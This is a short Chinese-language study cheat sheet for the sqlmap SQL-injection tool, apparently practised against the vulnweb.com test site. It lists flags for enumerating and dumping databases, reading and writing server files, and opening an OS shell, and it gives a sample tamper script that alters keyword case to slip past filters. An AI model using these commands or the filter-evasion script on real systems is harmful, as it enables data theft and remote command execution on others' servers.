# 参考:
https://www.cnblogs.com/bmjoker/p/9326258.html
# 数据猜解 - 库表列数据 & 字典
测试: http://vulnweb.com/
--current-db
--tables -D ""
--columns -T "" -D ""
--dump -C "" -C "" -T ""
# 权限操作 - 文件 & 命令 & 交互式
测试: MYSQL 高权限注入
引出权限:
--is-dba --privileges
引出文件:
--file-read --file-write --file-dest
引出命令:
--os-cmd= --os-shell --sql-shell
# 提交方法 -POST&HEAD&JSON
测试: Post Cookie Json
--data ""
--cookie ""
-r 1.txt

如果是json模式的话 就把数据包放在文件 然后对这文件进行注入
# 绕过模块 -Tamper 脚本 - 使用 & 开发
测试: base64 注入 有过滤的注入
--tamper=base64encode.py
--tamper=test.py
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
pass(遇到过滤 发现如何绕过 然后·写脚本 再用sqlmap)
def tamper(payload, **kwargs):
if payload:
payload = payload.replace('SELECT','sElEct')
payload = payload.replace('OR','Or')
payload = payload.replace('AND','And')
payload = payload.replace('SLEEP','SleeP')....
